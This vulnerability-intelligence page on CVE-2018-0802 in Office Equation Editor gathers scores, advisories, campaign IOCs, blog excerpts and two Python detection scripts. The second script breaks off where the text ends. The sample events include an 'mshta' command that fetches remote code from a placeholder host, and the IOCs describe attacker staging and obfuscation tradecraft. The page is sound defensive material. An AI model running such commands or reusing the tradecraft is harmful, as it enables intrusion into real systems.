CVE-2018-0802
Published: 2018-01-10
Priority: P1 · 85 · high
CVSS 3.1: 7.8 (AV:L / AC:L / PR:N / UI:R / S:U / C:H / I:H / A:H)
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2022-05-03
Exploited in the wild
EPSS: 93.29% (99.8th percentile)
Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE is unique from CVE-2018-0797 and CVE-2018-0812.
Affected
20 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | word | — | — |
| microsoft | word | — | — |
| microsoft | word | — | — |
| microsoft | word | — | — |
| msrc | microsoft_office_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_2013_service_pack_1 | — | — |
| msrc | microsoft_office_2016 | — | — |
| msrc | microsoft_office_2016_click-to-run_for_32-bit_editions | — | — |
| msrc | microsoft_office_2016_click-to-run_for_64-bit_editions | — | — |
| msrc | microsoft_office_compatibility_pack_service_pack_3 | — | — |
| msrc | microsoft_word_2007_service_pack_3 | — | — |
| msrc | microsoft_word_2010_service_pack_2 | — | — |
| msrc | microsoft_word_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_word_2013_service_pack_1 | — | — |
| msrc | microsoft_word_2016 | — | — |
Detection & IOCs (extracted from sources)
- CVE-2018-0802 is exploited through Microsoft Equation Editor (EQNEDT32.EXE). Detect EQNEDT32.EXE starting shortly after a user opens a document in Word or Excel, and treat any child process or outbound network connection from EQNEDT32.EXE as high-confidence exploitation, since Equation Editor has no legitimate reason to do either. Equation Editor is an out-of-process COM server started by the DCOM launcher, so its parent process is svchost.exe rather than WINWORD.EXE or EXCEL.EXE; parent-child rules keyed on the Office process will miss it, and the tie to the Office process has to be made by user and time window instead. The January 2018 Office updates that fixed this CVE removed Equation Editor altogether, so an EQNEDT32.EXE that is present and runnable is itself a sign that the fix is missing.
- Malicious RTF documents exploiting CVE-2018-0802 embed OLE objects with the class name 'Equation 3.0'; hunt for RTF files containing this OLE class name. Exploit builders routinely obfuscate the RTF \objclass control word, so also inspect the hex-encoded \objdata for the Equation 3.0 CLSID {0002CE02-0000-0000-C000-000000000046} and the 'Equation Native' stream name.
- Exploitation of CVE-2018-0802 via Royal Road (the 8.t RTF exploit builder): detect RTF attachments crafted with this builder, which is known to exploit CVE-2017-11882, CVE-2018-0802, and CVE-2018-0798.
- Post-exploitation: monitor for creation of scheduled tasks named 'Rdx' and 'RdxFac' running every five minutes, and creation of a folder 'RdxFact' in the Windows tasks folder.
- Post-exploitation: monitor for RdxFactory.exe dropped into the public user profile's music folder (C:\Users\Public\Music\RdxFactory.exe).
- Bitter APT emails were sent via JavaMail with Zimbra web client version 8.8.15_GA_4101; this header string can be used to identify campaign-related phishing emails.
- Shellcode from CVE-2018-0802 exploitation creates the folder C:\$Utf to stage the downloaded payload; monitor for creation of this unusual directory.
- CVE-2018-0802 is frequently exploited alongside CVE-2017-11882 and CVE-2018-0798 in the same maldoc; detections and mitigations should account for all three vulnerabilities together, not just CVE-2018-0802 in isolation.
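As an added example, not taken from any of the sources cited above, the Python below correlates Sysmon-style process-creation (EventId 1) and network (EventId 3) events the way the first bullet describes: it ties an EQNEDT32.EXE start to the Office process the same user launched shortly before, because the parent is svchost.exe rather than the Office application, and raises high-severity alerts for any child process or outbound connection from EQNEDT32.EXE. The field names follow Sysmon's; the event lines, user name, process IDs and the 192.0.2.10 address are constructed for the demonstration.

```python
# Added example (not from any source cited on this page): correlating EQNEDT32.EXE
# activity from Sysmon-style process-creation (EventId 1) and network (EventId 3)
# events. Field names follow Sysmon; the event lines below are constructed.
import json
from datetime import datetime, timedelta

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
EQNEDT = "eqnedt32.exe"


def image_name(path):
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def load_events(jsonl):
    """Parse one JSON event per line (constructed sample format)."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def detect_eqnedt_abuse(events, window=timedelta(minutes=10)):
    """Return (severity, message) alerts.

    EQNEDT32.EXE is started by the DCOM launcher (parent svchost.exe), so it is
    tied to the Office process that opened the document by user and time window
    rather than by parent PID. Any child process or network connection from
    EQNEDT32.EXE is treated as exploitation: Equation Editor does neither.
    """
    alerts = []
    office_starts = []  # (time, user, image) of Office hosts seen so far
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        when = datetime.fromisoformat(ev["UtcTime"])
        image = image_name(ev.get("Image", ""))
        if ev["EventId"] == 1:
            parent = image_name(ev.get("ParentImage", ""))
            if image in OFFICE_HOSTS:
                office_starts.append((when, ev["User"], image))
            elif image == EQNEDT:
                recent = [o for o in office_starts
                          if o[1] == ev["User"] and when - window <= o[0] <= when]
                host = recent[-1][2] if recent else "no Office process in window"
                alerts.append(("medium", f"{ev['UtcTime']} EQNEDT32.EXE started for "
                               f"{ev['User']} (parent {parent}; host {host})"))
            elif parent == EQNEDT:
                alerts.append(("high", f"{ev['UtcTime']} EQNEDT32.EXE spawned {image}: "
                               f"{ev.get('CommandLine', '')}"))
        elif ev["EventId"] == 3 and image == EQNEDT:
            alerts.append(("high", f"{ev['UtcTime']} EQNEDT32.EXE connected to "
                           f"{ev['DestinationIp']}:{ev['DestinationPort']}"))
    return alerts


# Constructed sample: Word opens an RTF, DCOM starts Equation Editor (note the
# svchost.exe parent and the -Embedding switch), which then spawns cmd.exe and
# connects out. The image paths are the default install locations.
SAMPLE_EVENTS = r"""
{"EventId":1,"UtcTime":"2024-03-01T09:00:00","User":"CORP\\alice","Image":"C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE","ParentImage":"C:\\Windows\\explorer.exe","ProcessId":4120,"ParentProcessId":3000,"CommandLine":"WINWORD.EXE invoice.rtf"}
{"EventId":1,"UtcTime":"2024-03-01T09:00:07","User":"CORP\\alice","Image":"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE","ParentImage":"C:\\Windows\\System32\\svchost.exe","ProcessId":5200,"ParentProcessId":880,"CommandLine":"EQNEDT32.EXE -Embedding"}
{"EventId":1,"UtcTime":"2024-03-01T09:00:08","User":"CORP\\alice","Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE","ProcessId":5244,"ParentProcessId":5200,"CommandLine":"cmd.exe /c mshta http://example.invalid/x.hta"}
{"EventId":3,"UtcTime":"2024-03-01T09:00:09","User":"CORP\\alice","Image":"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE","ProcessId":5200,"DestinationIp":"192.0.2.10","DestinationPort":80}
"""

if __name__ == "__main__":
    for severity, message in detect_eqnedt_abuse(load_events(SAMPLE_EVENTS)):
        print(severity.upper(), message)
```

Run stand-alone, the block prints one medium alert for the Equation Editor start, attributed to winword.exe, and two high alerts for the cmd.exe child and the outbound connection. On its own the medium alert mostly tells you that Equation Editor is still installed, which after the January 2018 updates means the fix for this CVE has not been applied to that host.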
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vulncheck | — | 8.8 | HIGH | — |
| cisa | — | 8.8 | HIGH | — |
| vendor_msrc | — | 7.8 | HIGH | — |

The 7.8 and 8.8 scores differ only in the attack-vector metric: NVD and Microsoft score the vector as Local because the victim has to open the crafted document on the affected machine, while the same vector with AV:N (the document being delivered over email or the web) computes to 8.8 under CVSS 3.x. Privileges required, user interaction and the high impact on confidentiality, integrity and availability are the same in both readings.
CISA
Microsoft Office Memory Corruption Vulnerability
cisa·2021-11-03·CVSS 8.8
CVE-2018-0802 [HIGH] CWE-787 Microsoft Office Memory Corruption Vulnerability
Vulnerability: Microsoft Office Memory Corruption Vulnerability
Affected: Microsoft Office
Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0798.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-0802
Remediation Due Date: 2022-05-03
CISA
Microsoft Office Memory Corruption Vulnerability
cisa·2021-11-03·CVSS 8.8
CVE-2018-0798 [HIGH] CWE-787 Microsoft Office Memory Corruption Vulnerability
Vulnerability: Microsoft Office Memory Corruption Vulnerability
Affected: Microsoft Office
Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0802.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-0798
Remediation Due Date: 2022-05-03
Microsoft
Microsoft Office Memory Corruption Vulnerability
vendor_msrc·2018-01-09·CVSS 7.8
CVE-2018-0802 [HIGH] Microsoft Office Memory Corruption Vulnerability
Microsoft Office Memory Corruption Vulnerability
Description: A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
Exploitation of the vulnerability requires that a user open a specially crafted file with
GHSA
GHSA-x323-9hmm-gv8q: Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulner
ghsa_unreviewed·2022-05-13·CVSS 7.8
CVE-2018-0802 [HIGH] CWE-787 GHSA-x323-9hmm-gv8q: Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulner
Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE is unique from CVE-2018-0797 and CVE-2018-0812.
VulnCheck
Microsoft Office Memory Corruption Vulnerability
vulncheck·2018·CVSS 8.8
CVE-2018-0798 [HIGH] CWE-787 Microsoft Office Memory Corruption Vulnerability
Microsoft Office Memory Corruption Vulnerability
Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0802.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Exploitation References: https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/; https://www.africacybersecurityconference.com/document/CrowdStrike_GTR_2019.pdf; https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.p
VulnCheck
Microsoft Office Memory Corruption Vulnerability
vulncheck·2018·CVSS 8.8
CVE-2018-0802 [HIGH] CWE-787 Microsoft Office Memory Corruption Vulnerability
Microsoft Office Memory Corruption Vulnerability
Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0798.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Exploitation References: https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2018-Jan; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.freebuf.com/column/159865.html; https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf; https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html; https://www.trendmicro.com/en_u
No detection rules found.
No public exploits indexed.
Securelist
Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload
blogs_securelist·2026-05-22·CVSS 7.8
CVE-2018-0802 [HIGH] Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload
Kaspersky
Table of Contents
Technical details
Initial infection
Fixed.ps1 (loader)
Fixed.ps1::Payload (VBCloud dropper)
Fixed.ps1::Payload (PowerShower)
PowerShower::Payload (credential grabber)
Multi-user RDP by patching termsrv.dll
Reverse SSH tunneling
Patched OpenSSH
RevSocks
Tor tunneling
PowerCloud
Browser checker
Victims
Conclusion
Indicators of compromise
Domains and IPs
File paths
Authors
Kaspersky
In 2025, we observed pervasive SSH tunnel activity, which has remained active into 2026, affecting many government organizations and commercial companies in Russia and Belarus. Behind some of this activity is Cloud Atlas, a group we have known since 2014. During our investigation, we identified new tools used by this group, as well as indicators of compromise.
Th
Securelist
Exploits and vulnerabilities in Q1 2026
blogs_securelist·2026-05-07·CVSS 7.8
CVE-2026-21519 [HIGH] Exploits and vulnerabilities in Q1 2026
Alexander Kolesnikov
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Notable vulnerabilities
CVE-2026-21519: Desktop Window Manager vulnerability
RegPwn (CVE-2026-21533): a system settings access control vulnerability
CVE-2026-21514: a Microsoft Office vulnerability
Clawdbot (CVE-2026-25253): an OpenClaw vulnerability
CVE-2026-34070: LangChain framework vulnerability
CVE-2026-22812: an OpenCode vulnerability
Conclusion and advice
Authors
Alexander Kolesnikov
During Q1 2026, the exploit kits leveraged by threat actors to target user systems expanded once again, incorporating new exploits for the Microsoft Off
Securelist
Vulnerability landscape in Q4 2025
blogs_securelist·2026-03-06
Vulnerability landscape in Q4 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- C2 frameworks
- Notable vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vulnerability disclosures, hitting popular libraries and mainstream applications. Several of these vulnerabilities were picked up by attackers and exploited in the wild almost immediately.
In this report, we dive into the statistics on published vulnerabilities and exploits, as well as the known vulnerabilities leveraged with popular C2 frameworks throughout Q4 2025.
## Statistics on registered vulnerabilities
This section contains statistics on regis
Securelist
Exploits and vulnerabilities in Q4 2025
blogs_securelist·2026-03-06·CVSS 7.8
CVE-2025-55182 [HIGH] Exploits and vulnerabilities in Q4 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Notable vulnerabilities
React2Shell (CVE-2025-55182): a vulnerability in React Server Components
CVE-2025-54100: command injection during the execution of curl (Invoke-WebRequest)
CVE-2025-11001: a vulnerability in 7-Zip
RediShell (CVE-2025-49844): a vulnerability in Redis
CVE-2025-24990: a vulnerability in the ltmdm64.sys driver
CVE-2025-59287: a vulnerability in Windows Server Update Services (WSUS)
Conclusion and advice
Authors
Alexander Kolesnikov
The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vul
Fortinet
Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails | FortiGuard Labs
blogs_fortinet·2026-02-10·CVSS 7.8
[HIGH] Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails | FortiGuard Labs
FortiGuard Labs Threat Research
# Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails
Technical analysis of a multi-stage phishing campaign delivering XWorm RAT through malicious Excel attachments, fileless .NET loaders, and process hollowing
FortiGuard Security Portfolio
2025 Threat Landscape Report
By
Xiaopeng Zhang
| February 10, 2026
- Article Contents
By
Xiaopeng Zhang
| February 10, 2026
Affected Platforms: Microsoft Windows
Impacted Users: Windows Users
Impact: Full remote control of the victim’s computer
Severity Level: High
## Background
FortiGuard Labs recently captured a phishing campaign in the wild delivering a new variant of XWorm.
XWorm is a multi-functional Remote Access Trojan (RAT) first identified in 2022 that remains actively
Fortinet
Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails | FortiGuard Labs
blogs_fortinet·2026-02-10·CVSS 7.8
CVE-2018-0802 [HIGH] Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails
Technical analysis of a multi-stage phishing campaign delivering XWorm RAT through malicious Excel attachments, fileless .NET loaders, and process hollowing
FORTIGUARD SECURITY PORTFOLIO 2025 THREAT LANDSCAPE REPORT
Background
Infection Chain
Multiple-Themed Phishing Emails
Crafted Excel File to Exploit
CVE-2018-0802
Analyzing the HTA File
The Fileless .NET Module and Process Hollowing
The XWorm Payload File
Dissecting the Packet
XWorm Control Commands
XWorm Plugins
XWorm Features
System Control:
Attacks:
XWorm RAT Management:
Other Capabilities:
Summary
Fortinet Protections
URLs:
C2 Server:
Relevant Sample SHA-256:
By Xiaopeng Zhang | February 10, 2026
Affected Platforms: Micros
Securelist
Cloud Atlas activity in the first half of 2025: what changed
blogs_securelist·2025-12-19·CVSS 7.8
[HIGH] Cloud Atlas activity in the first half of 2025: what changed
Table of Contents
Technical details
Initial infection
VBShower
VBShower::Backdoor
VBShower::Payload (1)
VBShower::Payload (2)
VBShower::Payload (3)
VBShower::Payload (4)
VBShower::Payload (5)
VBShower::Payload (6)
VBShower::Payload (7)
VBShower::Payload (8)
VBShower::Payload (9)
VBCloud
VBCloud::Launcher
VBCloud::Backdoor
VBCloud::Payload (FileGrabber)
PowerShower
PowerShower::Payload (1)
PowerShower::Payload (2)
CloudAtlas
CloudAtlas::Plugin (FileGrabber)
CloudAtlas::Plugin (Common)
CloudAtlas::Plugin (PasswordStealer)
CloudAtlas::Plugin (InfoCollector)
Python script
Victims
Conclusion
Indicators of compromise
File hashes
Domains and IPs
Authors
Kaspersky
Known since 2014, the Cloud Atlas group targets countries in Eastern Europe and Central Asia. Infecti
Securelist
New Cloud Atlas APT campaign
blogs_securelist·2025-12-19·CVSS 7.8
CVE-2018-0802 [HIGH] New Cloud Atlas APT campaign
Table of Contents
- Technical details
- Victims
- Conclusion
- Indicators of compromise
Authors
- Kaspersky
Known since 2014, the Cloud Atlas group targets countries in Eastern Europe and Central Asia. Infections occur via phishing emails containing a malicious document that exploits an old vulnerability in the Microsoft Office Equation Editor process (CVE-2018-0802) to download and execute malicious code. In this report, we describe the infection chain and tools that the group used in the first half of 2025, with particular focus on previously undescribed implants.
Additional information about this threat, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. Contact: [email protected].
## Technical details
### Initi
Securelist
Exploits and vulnerabilities in Q3 2025
blogs_securelist·2025-12-03·CVSS 7.8
CVE-2025-49704 [HIGH] Exploits and vulnerabilities in Q3 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Interesting vulnerabilities
ToolShell (CVE-2025-49704 and CVE-2025-49706, CVE-2025-53770 and CVE-2025-53771): insecure deserialization and an authentication bypass
CVE-2025-8088: a directory traversal vulnerability in WinRAR
CVE-2025-41244: a privilege escalation vulnerability in VMware Aria Operations and VMware Tools
Conclusion and advice
Authors
Alexander Kolesnikov
In the third quarter, attackers continued to exploit security flaws in WinRAR, while the total number of registered vulnerabilities grew again. In this report, we examine statistics on published vuln
Securelist
Analyzing the vulnerability landscape in Q3 2025
blogs_securelist·2025-12-03
Analyzing the vulnerability landscape in Q3 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- C2 frameworks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
In the third quarter, attackers continued to exploit security flaws in WinRAR, while the total number of registered vulnerabilities grew again. In this report, we examine statistics on published vulnerabilities and exploits, the most common security issues impacting Windows and Linux, and the vulnerabilities being leveraged in APT attacks that lead to the launch of widespread C2 frameworks. The report utilizes anonymized Kaspersky Security Network data, which was consensually provided by our users, as well as information from open sources.
## Statistics on
Securelist
Exploits and vulnerabilities in Q2 2025
blogs_securelist·2025-08-27·CVSS 8.2
CVE-2025-32433 [HIGH] Exploits and vulnerabilities in Q2 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Interesting vulnerabilities
CVE-2025-32433: vulnerability in the SSH server, part of the Erlang/OTP framework
CVE-2025-6218: directory traversal vulnerability in WinRAR
CVE-2025-3052: insecure data access vulnerability in NVRAM, allowing bypass of UEFI signature checks
CVE-2025-49113: insecure deserialization vulnerability in Roundcube Webmail
CVE-2025-1533: stack overflow vulnerability in the AsIO3.sys driver
Conclusion and advice
Authors
Alexander Kolesnikov
Vulnerability registrations in Q2 2025 proved to be quite dynamic. Vulnerabilities that were published i
Securelist
Vulnerability landscape analysis for Q2 2025
blogs_securelist·2025-08-27
Vulnerability landscape analysis for Q2 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- C2 frameworks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
Vulnerability registrations in Q2 2025 proved to be quite dynamic. Vulnerabilities that were published impact the security of nearly every computer subsystem: UEFI, drivers, operating systems, browsers, as well as user and web applications. Based on our analysis, threat actors continue to leverage vulnerabilities in real-world attacks as a means of gaining access to user systems, just like in previous periods.
This report also describes known vulnerabilities used with popular C2 frameworks during the first half of 2025.
## Statistics on registered vulnera
Securelist
Vulnerability landscape analysis for Q1 2025
blogs_securelist·2025-05-30
Vulnerability landscape analysis for Q1 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
The first quarter of 2025 saw the continued publication of vulnerabilities discovered and fixed in 2024, as some researchers were previously unable to disclose the details. This partially shifted the focus away from vulnerabilities that received new CVE-2025-NNNNN identifiers. The nature of the CVE assignment process can result in a notable delay between problem investigation and patch release, which is mitigated by reserving a CVE ID early in the process. As for trends in vulnerability exploitation, we are seeing increasing rates of attacks targeting older operating syste
Securelist
Exploits and vulnerabilities in Q1 2025
blogs_securelist·2025-05-30·CVSS 7.8
CVE-2025-21333 [HIGH] Exploits and vulnerabilities in Q1 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
ZDI-CAN-25373: a vulnerability in Windows that affects how LNK files are displayed
CVE-2025-21333: a heap buffer overflow vulnerability in the vkrnlintvsp.sys driver
CVE-2025-24071: a NetNTLM hash leakage vulnerability in the file system indexer
Conclusion and advice
Authors
Alexander Kolesnikov
The first quarter of 2025 saw the continued publication of vulnerabilities discovered and fixed in 2024, as some researchers were previously unable to disclose the details. This partially shifted the focus away from vulnerabilities that received new CVE-2025-NN
Securelist
Vulnerability landscape analysis for Q4 2024
blogs_securelist·2025-02-26
Vulnerability landscape analysis for Q4 2024
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
Q4 2024 saw fewer published exploits for Windows and Linux compared to the first three quarters. Although the number of registered vulnerabilities continued to rise, the total number of Proof of Concept (PoC) instances decreased compared to 2023. Among notable techniques in Q4, attackers leveraged undocumented RPC interfaces and targeted the Windows authentication mechanism.
## Statistics on registered vulnerabilities
This section contains statistics on registered vulnerabilities. Data is sourced from the CVE portal: cve.org.
Total number of registered vulnerabilities a
Securelist
Exploits and vulnerabilities in Q4 2024
blogs_securelist·2025-02-26·CVSS 6.5
CVE-2024-43572 [MEDIUM] Exploits and vulnerabilities in Q4 2024
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
CVE-2024-43572—Remote code execution vulnerability in Microsoft Management Console
CVE-2024-43451—NetNTLM hash disclosure vulnerability
CVE-2024-49039—Elevation of privilege vulnerability in Windows Task Scheduler
Conclusion and advice
Authors
Alexander Kolesnikov
Q4 2024 saw fewer published exploits for Windows and Linux compared to the first three quarters. Although the number of registered vulnerabilities continued to rise, the total number of Proof of Concept (PoC) instances decreased compared to 2023. Among notable techniques in Q4, attackers leve
Securelist
Cloud Atlas using a new backdoor, VBCloud, to steal data
blogs_securelist·2024-12-23·CVSS 7.8
CVE-2018-0802 [HIGH] Cloud Atlas using a new backdoor, VBCloud, to steal data
Table of Contents
- Introduction
- Technical details
- Geography of attacked users
- Conclusion
- Indicators of compromise
Authors
- Oleg Kupreev
## Introduction
Known since 2014, Cloud Atlas targets Eastern Europe and Central Asia. We’re shedding light on a previously undocumented toolset, which the group used heavily in 2024. Victims get infected via phishing emails containing a malicious document that exploits a vulnerability in the formula editor (CVE-2018-0802) to download and execute malware code. See below for the infection pattern.
Typical Cloud Atlas infection pattern
When opened, the document downloads a malicious template formatted as an RTF file from a remote server controlled by the attackers. It contains a formula editor exploit that downloads and runs an HTML Applica
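The Cloud Atlas chain above has two document stages that can be triaged offline: the DOCX whose remote template link fetches the RTF, and the RTF whose embedded OLE object is the Equation Editor exploit (the 'Equation 3.0' class-name hunt from the Detection & IOCs section). The Python below is an added example, not Kaspersky's code nor this page's: it checks word/_rels/settings.xml.rels for an external attachedTemplate relationship, extracts the hex \objdata of every RTF object while skipping the junk control words builders splice into it, and looks for the Equation 3.0 CLSID, the 'Equation Native' stream name and the CompObj class name. Both sample files are constructed in-line, and the example.invalid URL is a placeholder.

```python
# Added example (not Kaspersky's or the page's code): triage of the two document
# stages in the chain described above. Stage 1 is a DOCX that pulls a remote
# template; stage 2 is the RTF template carrying an Equation Editor OLE object.
import io
import re
import uuid
import zipfile
import xml.etree.ElementTree as ET

# Microsoft Equation 3.0 COM class, i.e. EQNEDT32.EXE. OLE stores GUIDs in the
# mixed-endian Windows binary layout, which uuid.bytes_le reproduces.
EQUATION_CLSID = uuid.UUID("0002CE02-0000-0000-C000-000000000046")
EQUATION_CLSID_LE = EQUATION_CLSID.bytes_le
EQUATION_NATIVE_UTF16 = "Equation Native".encode("utf-16-le")

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"


def remote_templates(docx_bytes):
    """Return the external attachedTemplate targets of a DOCX (stage 1)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "word/_rels/settings.xml.rels" not in zf.namelist():
            return []
        root = ET.fromstring(zf.read("word/_rels/settings.xml.rels"))
    return [rel.get("Target") for rel in root.iter(f"{{{REL_NS}}}Relationship")
            if rel.get("Type") == ATTACHED_TEMPLATE
            and rel.get("TargetMode") == "External"]


# RTF control words (\word123 ) and control symbols (\*, \'hh), skipped inside objdata
_RTF_CONTROL = re.compile(rb"\\[a-zA-Z]+-?\d* ?|\\'[0-9a-fA-F]{2}|\\.")


def objdata_blobs(rtf):
    """Yield the decoded bytes of every \\objdata group. Only hex digits are kept;
    whitespace, nested groups and control words are skipped, mirroring Word's
    tolerance for the junk exploit builders insert to defeat naive extraction."""
    for m in re.finditer(rb"\\objdata", rtf):
        pos, depth, hexdigits = m.end(), 0, bytearray()
        while pos < len(rtf):
            ch = rtf[pos:pos + 1]
            if ch == b"{":
                depth += 1
                pos += 1
            elif ch == b"}":
                if depth == 0:
                    break
                depth -= 1
                pos += 1
            elif ch == b"\\":
                cm = _RTF_CONTROL.match(rtf, pos)
                pos = cm.end() if cm else pos + 1
            else:
                if ch in b"0123456789abcdefABCDEF":
                    hexdigits += ch
                pos += 1
        if len(hexdigits) % 2:
            hexdigits = hexdigits[:-1]
        yield bytes.fromhex(hexdigits.decode())


def equation_indicators(rtf):
    """Return the Equation Editor indicators found in an RTF (stage 2)."""
    found = []
    if re.search(rb"\\objclass[^{}\\]*equation", rtf, re.IGNORECASE):
        found.append("objclass names Equation")
    for blob in objdata_blobs(rtf):
        if EQUATION_CLSID_LE in blob:
            found.append("Equation 3.0 CLSID in objdata")
        if EQUATION_NATIVE_UTF16 in blob:
            found.append("Equation Native stream in objdata")
        if b"Equation 3.0" in blob:
            found.append("Equation 3.0 CompObj name in objdata")
    return found


def build_sample_docx(template_url=None):
    """Constructed minimal DOCX; with a URL it carries a remote template link."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        if template_url:
            zf.writestr("word/_rels/settings.xml.rels",
                        f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                        f'Type="{ATTACHED_TEMPLATE}" Target="{template_url}" '
                        f'TargetMode="External"/></Relationships>')
    return buf.getvalue()


def build_sample_rtf():
    """Constructed RTF: an embedded object whose hex objdata carries the Equation
    CLSID and stream name, with a junk control word spliced into the hex run."""
    blob = (b"\x01\x05\x00\x00\x02\x00\x00\x00" + EQUATION_CLSID_LE
            + EQUATION_NATIVE_UTF16 + b"Equation 3.0\x00")
    hexdata = blob.hex().encode()
    hexdata = hexdata[:21] + b"\\junk42 " + hexdata[21:]
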